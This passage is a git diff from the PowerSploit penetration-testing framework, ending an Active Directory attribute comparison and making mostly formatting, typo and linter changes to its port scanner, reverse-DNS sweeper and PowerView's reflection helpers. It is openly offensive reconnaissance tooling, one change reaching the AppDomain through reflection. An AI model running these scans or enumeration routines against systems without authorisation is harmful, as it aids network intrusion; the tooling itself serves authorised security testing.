+ "homeDrive",
+ "homePhone",
+ "homePostalAddress",
+ "houseIdentifier",
+ "initials",
+ "instanceType",
+ "internationalISDNNumber",
+ "ipPhone",
+ "isCriticalSystemObject",
+ "isDeleted",
+ "isPrivilegeHolder",
+ "isRecycled",
+ "jpegPhoto",
+ "kMServer",
+ "l",
+ "labeledURI",
+ "lastKnownParent",
+ "lastLogoff",
+ "lastLogon",
+ "lastLogonTimestamp",
+ "lmPwdHistory",
+ "localeID",
+ "localPolicyFlags",
+ "location",
+ "lockoutTime",
+ "logonCount",
+ "logonHours",
+ "logonWorkstation",
+ "logRolloverInterval",
+ "machineRole",
+ "mail",
+ "managedBy",
+ "managedObjects",
+ "manager",
+ "masteredBy",
+ "maxStorage",
+ "memberOf",
+ "mhsORAddress",
+ "middleName",
+ "mobile",
+ "modifyTimeStamp",
+ "monitoredConfigurations",
+ "monitoredServices",
+ "monitoringAvailabilityStyle",
+ "monitoringAvailabilityWindow",
+ "monitoringCachedViaMail",
+ "monitoringCachedViaRPC",
+ "monitoringMailUpdateInterval",
+ "monitoringMailUpdateUnits",
+ "monitoringRPCUpdateInterval",
+ "monitoringRPCUpdateUnits",
+ "msCOM-PartitionSetLink",
+ "msCOM-UserLink",
+ "msCOM-UserPartitionSetLink",
+ "msDFSR-ComputerReferenceBL",
+ "msDFSR-MemberReferenceBL",
+ "msDRM-IdentityCertificate",
+ "msDS-AdditionalDnsHostName",
+ "msDS-AdditionalSamAccountName",
+ "msDS-AllowedToActOnBehalfOfOtherIdentity",
+ "msDS-AllowedToDelegateTo",
+ "msDS-Approx-Immed-Subordinates",
+ "msDS-AssignedAuthNPolicy",
+ "msDS-AssignedAuthNPolicySilo",
+ "msDS-AuthenticatedAtDC",
+ "msDS-AuthenticatedToAccountlist",
+ "msDS-AuthNPolicySiloMembersBL",
+ "msDS-Cached-Membership",
+ "msDS-Cached-Membership-Time-Stamp",
+ "msDS-ClaimSharesPossibleValuesWithBL",
+ "msDS-CloudAnchor",
+ "mS-DS-ConsistencyChildCount",
+ "mS-DS-ConsistencyGuid",
+ "mS-DS-CreatorSID",
+ "msDS-EnabledFeatureBL",
+ "msDS-ExecuteScriptPassword",
+ "msDS-FailedInteractiveLogonCount",
+ "msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon",
+ "msDS-GenerationId",
+ "msDS-HABSeniorityIndex",
+ "msDS-HostServiceAccount",
+ "msDS-HostServiceAccountBL",
+ "msDS-IsDomainFor",
+ "msDS-IsFullReplicaFor",
+ "msDS-isGC",
+ "msDS-IsPartialReplicaFor",
+ "msDS-IsPrimaryComputerFor",
+ "msDS-isRODC",
+ "msDS-IsUserCachableAtRodc",
+ "msDS-KeyCredentialLink",
+ "msDS-KeyPrincipalBL",
+ "msDS-KrbTgtLink",
+ "msDS-KrbTgtLinkBl",
+ "msDS-LastFailedInteractiveLogonTime",
+ "msDS-LastKnownRDN",
+ "msDS-LastSuccessfulInteractiveLogonTime",
+ "msDS-LocalEffectiveDeletionTime",
+ "msDS-LocalEffectiveRecycleTime",
+ "msDs-masteredBy",
+ "msds-memberOfTransitive",
+ "msDS-MembersForAzRoleBL",
+ "msDS-MembersOfResourcePropertyListBL",
+ "msds-memberTransitive",
+ "msDS-NCReplCursors",
+ "msDS-NCReplInboundNeighbors",
+ "msDS-NCReplOutboundNeighbors",
+ "msDS-NC-RO-Replica-Locations-BL",
+ "msDS-NcType",
+ "msDS-NeverRevealGroup",
+ "msDS-NonMembersBL",
+ "msDS-ObjectReferenceBL",
+ "msDS-ObjectSoa",
+ "msDS-OIDToGroupLinkBl",
+ "msDS-OperationsForAzRoleBL",
+ "msDS-OperationsForAzTaskBL",
+ "msDS-parentdistname",
+ "msDS-PhoneticCompanyName",
+ "msDS-PhoneticDepartment",
+ "msDS-PhoneticDisplayName",
+ "msDS-PhoneticFirstName",
+ "msDS-PhoneticLastName",
+ "msDS-PrimaryComputer",
+ "msDS-PrincipalName",
+ "msDS-PromotionSettings",
+ "msDS-PSOApplied",
+ "msDS-ReplAttributeMetaData",
+ "msDS-ReplValueMetaData",
+ "msDS-ReplValueMetaDataExt",
+ "msDS-ResultantPSO",
+ "msDS-RevealedDSAs",
+ "msDS-RevealedList",
+ "msDS-RevealedListBL",
+ "msDS-RevealedUsers",
+ "msDS-RevealOnDemandGroup",
+ "msDS-SecondaryKrbTgtNumber",
+ "msDS-Site-Affinity",
+ "msDS-SiteName",
+ "msDS-SourceAnchor",
+ "msDS-SourceObjectDN",
+ "msDS-SupportedEncryptionTypes",
+ "msDS-SyncServerUrl",
+ "msDS-TasksForAzRoleBL",
+ "msDS-TasksForAzTaskBL",
+ "msDS-TDOEgressBL",
+ "msDS-TDOIngressBL",
+ "msDS-User-Account-Control-Computed",
+ "msDS-UserPasswordExpiryTimeComputed",
+ "msDS-ValueTypeReferenceBL",
+ "msExchAcceptedDomainBL",
+ "msExchAccountForestBL",
+ "msExchArchiveDatabaseBL",
+ "msExchAssociatedAcceptedDomainBL",
+ "msExchAuthPolicyBL",
+ "msExchAuxMailboxParentObjectIdBL",
+ "msExchAvailabilityOrgWideAccountBL",
+ "msExchAvailabilityPerUserAccountBL",
+ "msExchCatchAllRecipientBL",
+ "msExchComponentStates",
+ "msExchConferenceMailboxBL",
+ "msExchControllingZone",
+ "msExchDataEncryptionPolicyBL",
+ "msExchDelegateListBL",
+ "msExchDeviceAccessControlRuleBL",
+ "msExchEvictedMemebersBL",
+ "msExchExchangeServerLink",
+ "msExchHABRootDepartmentBL",
+ "msExchHouseIdentifier",
+ "msExchHygieneConfigurationMalwareBL",
+ "msExchHygieneConfigurationSpamBL",
+ "msExchIMAPOWAURLPrefixOverride",
+ "msExchIntendedMailboxPlanBL",
+ "msExchMailboxMoveSourceArchiveMDBBL",
+ "msExchMailboxMoveSourceMDBBL",
+ "msExchMailboxMoveSourceUserBL",
+ "msExchMailboxMoveStorageMDBBL",
+ "msExchMailboxMoveTargetArchiveMDBBL",
+ "msExchMailboxMoveTargetMDBBL",
+ "msExchMailboxMoveTargetUserBL",
+ "msExchMDBAvailabilityGroupConfigurationBL",
+ "msExchMobileRemoteDocumentsAllowedServersBL",
+ "msExchMobileRemoteDocumentsBlockedServersBL",
+ "msExchMobileRemoteDocumentsInternalDomainSuffixListBL",
+ "msExchMultiMailboxDatabasesBL",
+ "msExchMultiMailboxLocationsBL",
+ "msExchOABGeneratingMailboxBL",
+ "msExchOrganizationsAddressBookRootsBL",
+ "msExchOrganizationsGlobalAddressListsBL",
+ "msExchOrganizationsTemplateRootsBL",
+ "msExchOriginatingForest",
+ "msExchOWAAllowedFileTypesBL",
+ "msExchOWAAllowedMimeTypesBL",
+ "msExchOWABlockedFileTypesBL",
+ "msExchOWABlockedMIMETypesBL",
+ "msExchOWAForceSaveFileTypesBL",
+ "msExchOWAForceSaveMIMETypesBL",
+ "msExchOWARemoteDocumentsAllowedServersBL",
+ "msExchOWARemoteDocumentsBlockedServersBL",
+ "msExchOWARemoteDocumentsInternalDomainSuffixListBL",
+ "msExchOWATranscodingFileTypesBL",
+ "msExchOWATranscodingMimeTypesBL",
+ "msExchParentPlanBL",
+ "msExchPolicyList",
+ "msExchPolicyOptionList",
+ "msExchQueryBaseDN",
+ "msExchRBACPolicyBL",
+ "msExchResourceGUID",
+ "msExchResourceProperties",
+ "msExchRMSComputerAccountsBL",
+ "msExchServerAssociationBL",
+ "msExchServerSiteBL",
+ "msExchSMTPReceiveDefaultAcceptedDomainBL",
+ "msExchSupervisionDLBL",
+ "msExchSupervisionOneOffBL",
+ "msExchSupervisionUserBL",
+ "msExchTransportRuleTargetBL",
+ "msExchTrustedDomainBL",
+ "msExchUGMemberBL",
+ "msExchUserBL",
+ "msExchUserCulture",
+ "msIIS-FTPDir",
+ "msIIS-FTPRoot",
+ "msImaging-HashAlgorithm",
+ "msImaging-ThumbprintHash",
+ "mSMQDigests",
+ "mSMQDigestsMig",
+ "mSMQSignCertificates",
+ "mSMQSignCertificatesMig",
+ "msNPAllowDialin",
+ "msNPCallingStationID",
+ "msNPSavedCallingStationID",
+ "msOrg-LeadersBL",
+ "msPKIAccountCredentials",
+ "msPKI-CredentialRoamingTokens",
+ "msPKIDPAPIMasterKeys",
+ "msPKIRoamingTimeStamp",
+ "msRADIUSCallbackNumber",
+ "msRADIUS-FramedInterfaceId",
+ "msRADIUSFramedIPAddress",
+ "msRADIUS-FramedIpv6Prefix",
+ "msRADIUS-FramedIpv6Route",
+ "msRADIUSFramedRoute",
+ "msRADIUS-SavedFramedInterfaceId",
+ "msRADIUS-SavedFramedIpv6Prefix",
+ "msRADIUS-SavedFramedIpv6Route",
+ "msRADIUSServiceType",
+ "msRASSavedCallbackNumber",
+ "msRASSavedFramedIPAddress",
+ "msRASSavedFramedRoute",
+ "msRTCSIP-AcpInfo",
+ "msRTCSIP-ApplicationOptions",
+ "msRTCSIP-ArchivingEnabled",
+ "msRTCSIP-DeploymentLocator",
+ "msRTCSIP-FederationEnabled",
+ "msRTCSIP-GroupingID",
+ "msRTCSIP-InternetAccessEnabled",
+ "msRTCSIP-Line",
+ "msRTCSIP-LineServer",
+ "msRTCSIP-OptionFlags",
+ "msRTCSIP-OriginatorSid",
+ "msRTCSIP-OwnerUrn",
+ "msRTCSIP-PrimaryHomeServer",
+ "msRTCSIP-PrimaryUserAddress",
+ "msRTCSIP-PrivateLine",
+ "msRTCSIP-TargetHomeServer",
+ "msRTCSIP-TargetUserPolicies",
+ "msRTCSIP-TenantId",
+ "msRTCSIP-UserEnabled",
+ "msRTCSIP-UserExtension",
+ "msRTCSIP-UserLocationProfile",
+ "msRTCSIP-UserPolicies",
+ "msRTCSIP-UserPolicy",
+ "msRTCSIP-UserRoutingGroupId",
+ "msSFU30Aliases",
+ "msSFU30Name",
+ "msSFU30NisDomain",
+ "msSFU30PosixMemberOf",
+ "msTPM-OwnerInformation",
+ "msTPM-TpmInformationForComputer",
+ "msTSAllowLogon",
+ "msTSBrokenConnectionAction",
+ "msTSConnectClientDrives",
+ "msTSConnectPrinterDrives",
+ "msTSDefaultToMainPrinter",
+ "msTSEndpointData",
+ "msTSEndpointPlugin",
+ "msTSEndpointType",
+ "msTSExpireDate",
+ "msTSExpireDate2",
+ "msTSExpireDate3",
+ "msTSExpireDate4",
+ "msTSHomeDirectory",
+ "msTSHomeDrive",
+ "msTSInitialProgram",
+ "msTSLicenseVersion",
+ "msTSLicenseVersion2",
+ "msTSLicenseVersion3",
+ "msTSLicenseVersion4",
+ "msTSLSProperty01",
+ "msTSLSProperty02",
+ "msTSManagingLS",
+ "msTSManagingLS2",
+ "msTSManagingLS3",
+ "msTSManagingLS4",
+ "msTSMaxConnectionTime",
+ "msTSMaxDisconnectionTime",
+ "msTSMaxIdleTime",
+ "msTSPrimaryDesktop",
+ "msTSPrimaryDesktopBL",
+ "msTSProfilePath",
+ "msTSProperty01",
+ "msTSProperty02",
+ "msTSReconnectionAction",
+ "msTSRemoteControl",
+ "msTSSecondaryDesktopBL",
+ "msTSSecondaryDesktops",
+ "msTSWorkDirectory",
+ "name",
+ "netbootDUID",
+ "netbootGUID",
+ "netbootInitialization",
+ "netbootMachineFilePath",
+ "netbootMirrorDataFile",
+ "netbootSCPBL",
+ "netbootSIFFile",
+ "networkAddress",
+ "nisMapName",
+ "nonSecurityMemberBL",
+ "ntPwdHistory",
+ "nTSecurityDescriptor",
+ "o",
+ "objectCategory",
+ "objectClass",
+ "objectGUID",
+ "objectVersion",
+ "operatingSystem",
+ "operatingSystemHotfix",
+ "operatingSystemServicePack",
+ "operatingSystemVersion",
+ "operatorCount",
+ "otherFacsimileTelephoneNumber",
+ "otherHomePhone",
+ "otherIpPhone",
+ "otherLoginWorkstations",
+ "otherMailbox",
+ "otherMobile",
+ "otherPager",
+ "otherTelephone",
+ "otherWellKnownObjects",
+ "ou",
+ "ownerBL",
+ "pager",
+ "partialAttributeDeletionList",
+ "partialAttributeSet",
+ "personalPager",
+ "personalTitle",
+ "photo",
+ "physicalDeliveryOfficeName",
+ "physicalLocationObject",
+ "policyReplicationFlags",
+ "possibleInferiors",
+ "postalAddress",
+ "postalCode",
+ "postOfficeBox",
+ "preferredDeliveryMethod",
+ "preferredLanguage",
+ "preferredOU",
+ "primaryGroupID",
+ "primaryInternationalISDNNumber",
+ "primaryTelexNumber",
+ "profilePath",
+ "promoExpiration",
+ "proxiedObjectName",
+ "proxyAddresses",
+ "pwdLastSet",
+ "queryPolicyBL",
+ "registeredAddress",
+ "replPropertyMetaData",
+ "replUpToDateVector",
+ "repsFrom",
+ "repsTo",
+ "revision",
+ "rIDSetReferences",
+ "roomNumber",
+ "scriptPath",
+ "sDRightsEffective",
+ "secretary",
+ "securityProtocol",
+ "seeAlso",
+ "serialNumber",
+ "serverReferenceBL",
+ "servicePrincipalName",
+ "showInAdvancedViewOnly",
+ "siteGUID",
+ "siteObjectBL",
+ "sn",
+ "st",
+ "street",
+ "streetAddress",
+ "structuralObjectClass",
+ "subRefs",
+ "subSchemaSubEntry",
+ "systemFlags",
+ "telephoneAssistant",
+ "telephoneNumber",
+ "teletexTerminalIdentifier",
+ "telexNumber",
+ "terminalServer",
+ "thumbnailLogo",
+ "thumbnailPhoto",
+ "title",
+ "trackingLogPathName",
+ "type",
+ "uid",
+ "unicodePwd",
+ "url",
+ "userAccountControl",
+ "userCertificate",
+ "userParameters",
+ "userPassword",
+ "userPKCS12",
+ "userPrincipalName",
+ "userSharedFolder",
+ "userSharedFolderOther",
+ "userSMIMECertificate",
+ "userWorkstations",
+ "uSNChanged",
+ "uSNCreated",
+ "uSNDSALastObjRemoved",
+ "USNIntersite",
+ "uSNLastObjRem",
+ "uSNSource",
+ "volumeCount",
+ "wbemPath",
+ "wellKnownObjects",
+ "whenChanged",
+ "whenCreated",
+ "wWWHomePage",
+ "x121Address",
+ "x500uniqueIdentifier"
+ )
+ $Compare = Compare-Object -ReferenceObject $ComputerAttributeList -DifferenceObject $ComputerAttributeListFromAD
+ Write-Output $Compare
+ }
+ }
+}
+ \ No newline at end of file
diff --git a/Recon/Invoke-Portscan.ps1 b/Recon/Invoke-Portscan.ps1
index 6f059e2..7e28709 100644
--- a/Recon/Invoke-Portscan.ps1
+++ b/Recon/Invoke-Portscan.ps1
@@ -5,11 +5,11 @@ function Invoke-Portscan
Simple portscan module
-PowerSploit Function: Invoke-Portscan
-Author: Rich Lundeen (http://webstersProdigy.net)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+PowerSploit Function: Invoke-Portscan
+Author: Rich Lundeen (http://webstersProdigy.net)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
.DESCRIPTION
@@ -114,7 +114,7 @@ Force Overwrite if output Files exist. Otherwise it throws exception
.EXAMPLE
-C:\PS> Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50
+Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50
Description
-----------
@@ -122,7 +122,7 @@ Scans the top 50 ports for hosts found for webstersprodigy.net,google.com, and m
.EXAMPLE
-C:\PS> echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080"
+echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080"
Description
-----------
@@ -130,7 +130,7 @@ Does a portscan of "webstersprodigy.net", and writes a greppable output file
.EXAMPLE
-C:\PS> Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet
+Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet
Description
-----------
@@ -141,7 +141,13 @@ Scans the top 20 ports for hosts found in the 192.168.1.1/24 range, outputs all
http://webstersprodigy.net
#>
- [CmdletBinding()]Param (
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseSingularNouns', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseLiteralInitializerForHashtable', '')]
+ [CmdletBinding()]
+ Param (
#Host, Ports
[Parameter(ParameterSetName="cmdHosts",
@@ -748,9 +754,9 @@ http://webstersprodigy.net
#TODO deal with output
Write-PortscanOut -comment $startMsg -grepStream $grepStream -xmlStream $xmlStream -readableStream $readableStream
- #converting back from int array gives some argument error checking
- $sPortList = [string]::join(",", $portList)
- $sHostPortList = [string]::join(",", $hostPortList)
+ # #converting back from int array gives some argument error checking
+ # $sPortList = [string]::join(",", $portList)
+ # $sHostPortList = [string]::join(",", $hostPortList)
########
#Port Scan Code - run on a per host basis
@@ -840,7 +846,6 @@ http://webstersprodigy.net
$sockets[$p] = new-object System.Net.Sockets.TcpClient
}
-
$scriptBlockAsString = @"
#somewhat of a race condition with the timeout, but I don't think it matters
@@ -885,8 +890,7 @@ http://webstersprodigy.net
$timeouts[$p].Enabled = $true
$myscriptblock = [scriptblock]::Create($scriptBlockAsString)
- $x = $sockets[$p].beginConnect($h, $p,(New-ScriptBlockCallback($myscriptblock)) , $null)
-
+ $Null = $sockets[$p].beginConnect($h, $p,(New-ScriptBlockCallback($myscriptblock)) , $null)
}
function PortScan-Alive
diff --git a/Recon/Invoke-ReverseDnsLookup.ps1 b/Recon/Invoke-ReverseDnsLookup.ps1
index 5e811ee..36e6398 100644
--- a/Recon/Invoke-ReverseDnsLookup.ps1
+++ b/Recon/Invoke-ReverseDnsLookup.ps1
@@ -5,23 +5,23 @@ function Invoke-ReverseDnsLookup
Perform a reverse DNS lookup scan on a range of IP addresses.
-PowerSploit Function: Invoke-ReverseDnsLookup
-Author: Matthew Graeber (@mattifestation)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
-
+PowerSploit Function: Invoke-ReverseDnsLookup
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
.DESCRIPTION
-Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. This script is useful for performing DNS reconnaisance prior to conducting an authorized penetration test.
-
+Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. This script is useful for performing DNS reconnaissance prior to conducting an authorized penetration test.
+
.PARAMETER IPRange
Specifies the IP address range. The range provided can be in the form of a single IP address, a low-high range, or a CIDR range. Comma-delimited ranges may can be provided.
-
+
.EXAMPLE
-C:\PS> Invoke-ReverseDnsLookup 74.125.228.0/29
+Invoke-ReverseDnsLookup 74.125.228.0/29
IP HostName
-- --------
@@ -31,29 +31,29 @@ IP HostName
74.125.228.4 iad23s05-in-f4.1e100.net
74.125.228.5 iad23s05-in-f5.1e100.net
74.125.228.6 iad23s05-in-f6.1e100.net
-
+
Description
-----------
Returns the hostnames of the IP addresses specified by the CIDR range.
-
+
.EXAMPLE
-C:\PS> Invoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6'
-
+Invoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6'
+
IP HostName
-- --------
74.125.228.1 iad23s05-in-f1.1e100.net
74.125.228.4 iad23s05-in-f4.1e100.net
74.125.228.5 iad23s05-in-f5.1e100.net
74.125.228.6 iad23s05-in-f6.1e100.net
-
+
Description
-----------
Returns the hostnames of the IP addresses specified by the IP range specified.
.EXAMPLE
-PS C:\> Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup
+Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup
IP HostName
-- --------
@@ -69,13 +69,15 @@ Description
-----------
Returns the hostnames of the IP addresses piped from another source.
-
.LINK
http://www.exploit-monday.com
https://github.com/mattifestation/PowerSploit
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')]
+ [CmdletBinding()]
Param (
[Parameter(Position = 0, Mandatory = $True,ValueFromPipeline=$True)]
[String]
@@ -83,14 +85,14 @@ https://github.com/mattifestation/PowerSploit
)
BEGIN {
-
+
function Parse-IPList ([String] $IpRange)
{
-
+
function IPtoInt
{
Param([String] $IpString)
-
+
$Hexstr = ""
$Octets = $IpString.Split(".")
foreach ($Octet in $Octets) {
@@ -98,7 +100,7 @@ https://github.com/mattifestation/PowerSploit
}
return [Convert]::ToInt64($Hexstr, 16)
}
-
+
function InttoIP
{
Param([Int64] $IpInt)
@@ -110,15 +112,15 @@ https://github.com/mattifestation/PowerSploit
}
return $IpStr.TrimEnd('.')
}
-
+
$Ip = [System.Net.IPAddress]::Parse("127.0.0.1")
-
+
foreach ($Str in $IpRange.Split(","))
{
$Item = $Str.Trim()
$Result = ""
$IpRegex = "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
-
+
# First, validate the input
switch -regex ($Item)
{
@@ -139,11 +141,11 @@ https://github.com/mattifestation/PowerSploit
}
default
{
- Write-Warning "Inproper input"
+ Write-Warning "Improper input"
return
}
}
-
+
#Now, start processing the IP addresses
switch ($Result)
{
@@ -152,14 +154,14 @@ https://github.com/mattifestation/PowerSploit
$CidrRange = $Item.Split("/")
$Network = $CidrRange[0]
$Mask = $CidrRange[1]
-
+
if (!([System.Net.IPAddress]::TryParse($Network, [ref] $Ip))) { Write-Warning "Invalid IP address supplied!"; return}
if (($Mask -lt 0) -or ($Mask -gt 30)) { Write-Warning "Invalid network mask! Acceptable values are 0-30"; return}
-
+
$BinaryIP = [Convert]::ToString((IPtoInt $Network),2).PadLeft(32,'0')
#Generate lower limit (Excluding network address)
$Lower = $BinaryIP.Substring(0, $Mask) + "0" * ((32-$Mask)-1) + "1"
- #Generate upperr limit (Excluding broadcast address)
+ #Generate upper limit (Excluding broadcast address)
$Upper = $BinaryIP.Substring(0, $Mask) + "1" * ((32-$Mask)-1) + "0"
$LowerInt = [Convert]::ToInt64($Lower, 2)
$UpperInt = [Convert]::ToInt64($Upper, 2)
@@ -168,21 +170,21 @@ https://github.com/mattifestation/PowerSploit
"range"
{
$Range = $item.Split("-")
-
+
if ([System.Net.IPAddress]::TryParse($Range[0],[ref]$Ip)) { $Temp1 = $Ip }
else { Write-Warning "Invalid IP address supplied!"; return }
-
+
if ([System.Net.IPAddress]::TryParse($Range[1],[ref]$Ip)) { $Temp2 = $Ip }
else { Write-Warning "Invalid IP address supplied!"; return }
-
+
$Left = (IPtoInt $Temp1.ToString())
$Right = (IPtoInt $Temp2.ToString())
-
+
if ($Right -gt $Left) {
for ($i = $Left; $i -le $Right; $i++) { InttoIP $i }
}
else { Write-Warning "Invalid IP range. The right portion must be greater than the left portion."; return}
-
+
break
}
"single"
@@ -193,28 +195,30 @@ https://github.com/mattifestation/PowerSploit
}
default
{
- Write-Warning "An error occured."
+ Write-Warning "An error occurred."
return
}
}
}
-
}
}
-
+
PROCESS {
Parse-IPList $IpRange | ForEach-Object {
try {
Write-Verbose "Resolving $_"
$Temp = [System.Net.Dns]::GetHostEntry($_)
-
+
$Result = @{
IP = $_
HostName = $Temp.HostName
}
-
+
New-Object PSObject -Property $Result
- } catch [System.Net.Sockets.SocketException] {}
+ }
+ catch [System.Net.Sockets.SocketException] {
+ Write-Verbose "Error: $_"
+ }
}
}
}
diff --git a/Recon/PowerView.ps1 b/Recon/PowerView.ps1
index d35a9f0..b28ac0a 100755
--- a/Recon/PowerView.ps1
+++ b/Recon/PowerView.ps1
@@ -2,14 +2,14 @@
<#
- PowerSploit File: PowerView.ps1
- Author: Will Schroeder (@harmj0y)
- License: BSD 3-Clause
- Required Dependencies: None
- Optional Dependencies: None
+PowerSploit File: PowerView.ps1
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
#>
+
########################################################
#
# PSReflect code for Windows API access
@@ -18,53 +18,54 @@
#
########################################################
-function New-InMemoryModule
-{
+function New-InMemoryModule {
<#
- .SYNOPSIS
+.SYNOPSIS
- Creates an in-memory assembly and module
+Creates an in-memory assembly and module
- Author: Matthew Graeber (@mattifestation)
- License: BSD 3-Clause
- Required Dependencies: None
- Optional Dependencies: None
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
- .DESCRIPTION
+.DESCRIPTION
- When defining custom enums, structs, and unmanaged functions, it is
- necessary to associate to an assembly module. This helper function
- creates an in-memory module that can be passed to the 'enum',
- 'struct', and Add-Win32Type functions.
+When defining custom enums, structs, and unmanaged functions, it is
+necessary to associate to an assembly module. This helper function
+creates an in-memory module that can be passed to the 'enum',
+'struct', and Add-Win32Type functions.
- .PARAMETER ModuleName
+.PARAMETER ModuleName
- Specifies the desired name for the in-memory assembly and module. If
- ModuleName is not provided, it will default to a GUID.
+Specifies the desired name for the in-memory assembly and module. If
+ModuleName is not provided, it will default to a GUID.
- .EXAMPLE
+.EXAMPLE
- $Module = New-InMemoryModule -ModuleName Win32
+$Module = New-InMemoryModule -ModuleName Win32
#>
- Param
- (
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+ [CmdletBinding()]
+ Param (
[Parameter(Position = 0)]
[ValidateNotNullOrEmpty()]
[String]
$ModuleName = [Guid]::NewGuid().ToString()
)
- $LoadedAssemblies = [AppDomain]::CurrentDomain.GetAssemblies()
+ $AppDomain = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @())
+ $LoadedAssemblies = $AppDomain.GetAssemblies()
- ForEach ($Assembly in $LoadedAssemblies) {
+ foreach ($Assembly in $LoadedAssemblies) {
if ($Assembly.FullName -and ($Assembly.FullName.Split(',')[0] -eq $ModuleName)) {
return $Assembly
}
}
$DynAssembly = New-Object Reflection.AssemblyName($ModuleName)
- $Domain = [AppDomain]::CurrentDomain
+ $Domain = $AppDomain
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, 'Run')
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule($ModuleName, $False)
@@ -74,16 +75,14 @@ function New-InMemoryModule
# A helper function used to reduce typing while defining function
# prototypes for Add-Win32Type.
-function func
-{
- Param
- (
+function func {
+ Param (
[Parameter(Position = 0, Mandatory = $True)]
[String]
$DllName,
[Parameter(Position = 1, Mandatory = $True)]
- [String]
+ [string]
$FunctionName,
[Parameter(Position = 2, Mandatory = $True)]
@@ -102,6 +101,9 @@ function func
[Runtime.InteropServices.CharSet]
$Charset,
+ [String]
+ $EntryPoint,
+
[Switch]
$SetLastError
)
@@ -116,6 +118,7 @@ function func
if ($NativeCallingConvention) { $Properties['NativeCallingConvention'] = $NativeCallingConvention }
if ($Charset) { $Properties['Charset'] = $Charset }
if ($SetLastError) { $Properties['SetLastError'] = $SetLastError }
+ if ($EntryPoint) { $Properties['EntryPoint'] = $EntryPoint }
New-Object PSObject -Property $Properties
}
@@ -124,123 +127,133 @@ function func
function Add-Win32Type
{
<#
- .SYNOPSIS
+.SYNOPSIS
- Creates a .NET type for an unmanaged Win32 function.
+Creates a .NET type for an unmanaged Win32 function.
- Author: Matthew Graeber (@mattifestation)
- License: BSD 3-Clause
- Required Dependencies: None
- Optional Dependencies: func
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: func
- .DESCRIPTION
+.DESCRIPTION
- Add-Win32Type enables you to easily interact with unmanaged (i.e.
- Win32 unmanaged) functions in PowerShell. After providing
- Add-Win32Type with a function signature, a .NET type is created
- using reflection (i.e. csc.exe is never called like with Add-Type).
+Add-Win32Type enables you to easily interact with unmanaged (i.e.
+Win32 unmanaged) functions in PowerShell. After providing
+Add-Win32Type with a function signature, a .NET type is created
+using reflection (i.e. csc.exe is never called like with Add-Type).
- The 'func' helper function can be used to reduce typing when defining
- multiple function definitions.
+The 'func' helper function can be used to reduce typing when defining
+multiple function definitions.
- .PARAMETER DllName
+.PARAMETER DllName
- The name of the DLL.
+The name of the DLL.
- .PARAMETER FunctionName
+.PARAMETER FunctionName
- The name of the target function.
+The name of the target function.
- .PARAMETER ReturnType
+.PARAMETER EntryPoint
- The return type of the function.
+The DLL export function name. This argument should be specified if the
+specified function name is different than the name of the exported
+function.
- .PARAMETER ParameterTypes
+.PARAMETER ReturnType
- The function parameters.
+The return type of the function.
- .PARAMETER NativeCallingConvention
+.PARAMETER ParameterTypes
- Specifies the native calling convention of the function. Defaults to
- stdcall.
+The function parameters.
- .PARAMETER Charset
+.PARAMETER NativeCallingConvention
- If you need to explicitly call an 'A' or 'W' Win32 function, you can
- specify the character set.
+Specifies the native calling convention of the function. Defaults to
+stdcall.
- .PARAMETER SetLastError
+.PARAMETER Charset
- Indicates whether the callee calls the SetLastError Win32 API
- function before returning from the attributed method.
+If you need to explicitly call an 'A' or 'W' Win32 function, you can
+specify the character set.
- .PARAMETER Module
+.PARAMETER SetLastError
- The in-memory module that will host the functions. Use
- New-InMemoryModule to define an in-memory module.
+Indicates whether the callee calls the SetLastError Win32 API
+function before returning from the attributed method.
- .PARAMETER Namespace
+.PARAMETER Module
- An optional namespace to prepend to the type. Add-Win32Type defaults
- to a namespace consisting only of the name of the DLL.
+The in-memory module that will host the functions. Use
+New-InMemoryModule to define an in-memory module.
- .EXAMPLE
+.PARAMETER Namespace
- $Mod = New-InMemoryModule -ModuleName Win32
+An optional namespace to prepend to the type. Add-Win32Type defaults
+to a namespace consisting only of the name of the DLL.
+
+.EXAMPLE
+
+$Mod = New-InMemoryModule -ModuleName Win32
- $FunctionDefinitions = @(
